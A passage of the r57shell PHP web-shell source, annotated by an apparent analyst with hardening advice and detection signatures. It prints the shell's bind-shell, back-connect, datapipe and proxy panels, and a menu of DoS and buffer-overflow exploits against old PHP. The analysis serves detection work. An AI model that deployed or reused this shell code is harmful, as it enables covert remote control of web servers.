// account, and perl/cc/gcc processes spawned by the PHP worker.
// Hardening: egress filtering for the web tier and no compilers on production web hosts.
7598if(!$safe_mode && $unix){
7599
7600echo $table_up1.div_title($lang[$language.'_text81'],'id37').$table_up2.div('id37').$ts."<tr>".$fs."<td valign=top width=25%>".$ts;
7601
7602echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>";
7603
7604echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',10,'11457'));
7605
7606echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',10,'r57'));
7607
7608echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
7609
7610echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));
7611
7612echo $te."</td>".$fe.$fs."<td valign=top width=25%>".$ts;
7613
7614echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>";
7615
7616echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
7617
7618echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457'));
7619
7620echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
7621
7622echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
7623
7624echo $te."</td>".$fe.$fs."<td valign=top width=25%>".$ts;
7625
7626echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text22']."</div></b></font>";
7627
7628echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',10,'11457'));
7629
7630echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',10,'irc.dalnet.ru'));
7631
7632echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',10,'6667'));
7633
7634echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir));
7635
7636echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
7637
7638echo $te."</td>".$fe.$fs."<td valign=top width=25%>".$ts;
7639
7640echo "<font face=Verdana size=-2><b><div align=center id='n'>Proxy</div></b></font>";
7641
7642echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','proxy_port',10,'31337'));
7643
7644echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option></select>".in('hidden','dir',0,$dir));
7645
7646echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
7647
7648echo $te."</td>".$fe."</tr></div></table>";
7649
7650}
7651
7652
7653
// Analyst note: final panel and page footer. This run is unconditional (no feature gate).
// Each row is its own one-button form posting a hidden cmd value dos1 ... dos38; the button
// labels name a PHP function or component and the PHP version range the author associates
// with it. Every version bound printed here is PHP 5.2.x or older, so the list is mainly of
// historical interest on a maintained runtime. The code behind each cmd value is outside this chunk.
// Hunting pivot: a request body matching cmd=dos<number>.
// Static-detection pivot: the footer emits the literal banner text "r57shell | version" followed
// by a generation-time figure; that string is a cheap signature for file scans and for
// response-body inspection.
// NOTE(review): the footer subtracts the bareword starttime (no $), i.e. a constant; whether it
// is define()d earlier in the file is not visible here.
7654echo $table_up1.div_title($lang[$language.'_text140'],'id38').$table_up2.div('id38').$ts."<tr><td valign=top width=25%>".$ts;
7655
7656echo "<font face=Verdana color=red size=-2><b><div align=center id='n'>".$lang[$language.'_text141']."</div></b></font>";
7657
7658echo sr(10,"",$fs.in('hidden','cmd',0,'dos1').in('submit','submit',0,'Recursive memory exhaustion').$fe);
7659
7660echo sr(10,"",$fs.in('hidden','cmd',0,'dos2').in('submit','submit',0,'Memory_limit [pack()]').$fe);
7661
7662echo sr(10,"",$fs.in('hidden','cmd',0,'dos3').in('submit','submit',0,'BoF [unserialize()]').$fe);
7663
7664echo sr(10,"",$fs.in('hidden','cmd',0,'dos4').in('submit','submit',0,'BoF ZendEngine').$fe);
7665
7666echo sr(10,"",$fs.in('hidden','cmd',0,'dos5').in('submit','submit',0,'SQlite [dl()] vuln').$fe);
7667
7668echo sr(10,"",$fs.in('hidden','cmd',0,'dos6').in('submit','submit',0,'PCRE [preg_match()](PHP<5.2.1)').$fe);
7669
7670echo sr(10,"",$fs.in('hidden','cmd',0,'dos7').in('submit','submit',0,'Mem_limit [str_repeat()](PHP<5.2.1)').$fe);
7671
7672echo sr(10,"",$fs.in('hidden','cmd',0,'dos8').in('submit','submit',0,'Apache process killer').$fe);
7673
7674echo sr(10,"",$fs.in('hidden','cmd',0,'dos9').in('submit','submit',0,'Overload [tempnam()](PHP<5.1.2)').$fe);
7675
7676echo sr(10,"",$fs.in('hidden','cmd',0,'dos10').in('submit','submit',0,'BoF [wordwrap()](PHP<5.1.2)').$fe);
7677
7678echo sr(10,"",$fs.in('hidden','cmd',0,'dos11').in('submit','submit',0,'BoF [array_fill()](PHP<5.1.2)').$fe);
7679
7680echo sr(10,"",$fs.in('hidden','cmd',0,'dos12').in('submit','submit',0,'BoF [substr_compare()](PHP<5.1.2)').$fe);
7681
7682echo $te."</td><td valign=top width=25%>".$ts;
7683
7684echo "<font face=Verdana color=red size=-2><b><div align=center id='n'>".$lang[$language.'_text141']."</div></b></font>";
7685
7686echo sr(10,"",$fs.in('hidden','cmd',0,'dos13').in('submit','submit',0,'Arr. Cr. 64b[unserialize()](PHP<5.2.1)').$fe);
7687
7688echo sr(10,"",$fs.in('hidden','cmd',0,'dos14').in('submit','submit',0,'BoF [str_ireplace()](PHP<5.2.x)').$fe);
7689
7690echo sr(10,"",$fs.in('hidden','cmd',0,'dos15').in('submit','submit',0,'BoF [htmlentities()](PHP<5.1.6,4.4.4)').$fe);
7691
7692echo sr(10,"",$fs.in('hidden','cmd',0,'dos16').in('submit','submit',0,'BoF [zip_entry_read()](PHP<4.4.5)').$fe);
7693
7694echo sr(10,"",$fs.in('hidden','cmd',0,'dos17').in('submit','submit',0,'BoF [sqlite_udf_decode_binary()](PHP<5.2.1)').$fe);
7695
7696echo sr(10,"",$fs.in('hidden','cmd',0,'dos18').in('submit','submit',0,'BoF [msg_receive()](PHP<5.2.1)').$fe);
7697
7698echo sr(10,"",$fs.in('hidden','cmd',0,'dos19').in('submit','submit',0,'BoF [php_stream_filter_create()](PHP5<5.2.1)').$fe);
7699
7700echo sr(10,"",$fs.in('hidden','cmd',0,'dos20').in('submit','submit',0,'BoF [unserialize()](PHP<4.4.4)').$fe);
7701
7702echo sr(10,"",$fs.in('hidden','cmd',0,'dos21').in('submit','submit',0,'BoF [gdImageCreateTrueColor()](PHP<5.2.x)').$fe);
7703
7704echo sr(10,"",$fs.in('hidden','cmd',0,'dos22').in('submit','submit',0,'BoF [gdImageCopyResized()](PHP<5.2.x)').$fe);
7705
7706echo sr(10,"",$fs.in('hidden','cmd',0,'dos23').in('submit','submit',0,'DoS [iconv_substr()](PHP<5.2.x)').$fe);
7707
7708echo sr(10,"",$fs.in('hidden','cmd',0,'dos24').in('submit','submit',0,'DoS [setlocale()](PHP<5.2.x)').$fe);
7709
7710echo $te."</td><td valign=top width=25%>".$ts;
7711
7712echo "<font face=Verdana color=red size=-2><b><div align=center id='n'>".$lang[$language.'_text141']."</div></b></font>";
7713
7714echo sr(10,"",$fs.in('hidden','cmd',0,'dos25').in('submit','submit',0,'DoS [glob()] 1 (PHP<5.2.x)').$fe);
7715
7716echo sr(10,"",$fs.in('hidden','cmd',0,'dos26').in('submit','submit',0,'DoS [glob()] 2 (PHP<5.2.x)').$fe);
7717
7718echo sr(10,"",$fs.in('hidden','cmd',0,'dos27').in('submit','submit',0,'DoS [fnmatch()](PHP<5.2.x)').$fe);
7719
7720echo sr(10,"",$fs.in('hidden','cmd',0,'dos28').in('submit','submit',0,'BoF [imagepsloadfont()](PHP<5.2.x)').$fe);
7721
7722echo sr(10,"",$fs.in('hidden','cmd',0,'dos29').in('submit','submit',0,'BoF mSQL [msql_connect](PHP<5.2.x)').$fe);
7723
7724echo sr(10,"",$fs.in('hidden','cmd',0,'dos30').in('submit','submit',0,'BoF [chunk_split()](PHP<5.2.x)').$fe);
7725
7726echo sr(10,"",$fs.in('hidden','cmd',0,'dos31').in('submit','submit',0,'BoF [php_win32sti.dl](PHP<5.2.x)').$fe);
7727
7728echo sr(10,"",$fs.in('hidden','cmd',0,'dos32').in('submit','submit',0,'BoF [php_iisfunc.dll](PHP<5.2.x)').$fe);
7729
7730echo sr(10,"",$fs.in('hidden','cmd',0,'dos33').in('submit','submit',0,'BoF [ntuser_getuserlist()](PHP<5.2.x)').$fe);
7731
7732echo sr(10,"",$fs.in('hidden','cmd',0,'dos34').in('submit','submit',0,'DoS [com_print_typeinfo()](PHP<5.2.x)').$fe);
7733
7734echo sr(10,"",$fs.in('hidden','cmd',0,'dos35').in('submit','submit',0,'BoF [iconv()](PHP<5.2.x)').$fe);
7735
7736echo sr(10,"",$fs.in('hidden','cmd',0,'dos36').in('submit','submit',0,'BoF [iconv_m_d_headers()](PHP<5.2.x)').$fe);
7737
7738echo $te."</td><td valign=top width=25%>".$ts;
7739
7740echo "<font face=Verdana color=red size=-2><b><div align=center id='n'>".$lang[$language.'_text141']."</div></b></font>";
7741
7742echo sr(10,"",$fs.in('hidden','cmd',0,'dos37').in('submit','submit',0,'BoF [iconv_mime_decode()](PHP<5.2.x)').$fe);
7743
7744echo sr(10,"",$fs.in('hidden','cmd',0,'dos38').in('submit','submit',0,'BoF [iconv_strlen()](PHP<5.2.x)').$fe);
7745
7746/*echo sr(10,"",$fs.in('hidden','cmd',0,'dos').in('submit','submit',0,'BoF [()](PHP<5.2.x)').$fe);*/
7747
7748echo $te."</td></tr></div></table>";
7749
7750echo '</table>'.$table_up3."</div></div><div align=center id='n'><font face=Verdana size=-2><b>o---[ r57shell | version ".$version." | <a href=http://www.c99php.com/>r57shell v.1.42 Edited By KingDefacer</a> | Generation time: ".round(getmicrotime()-starttime,4)." ]---o</b></font></div></td></tr></table>";
7751
7752echo '</body></html>';
7753
7754?>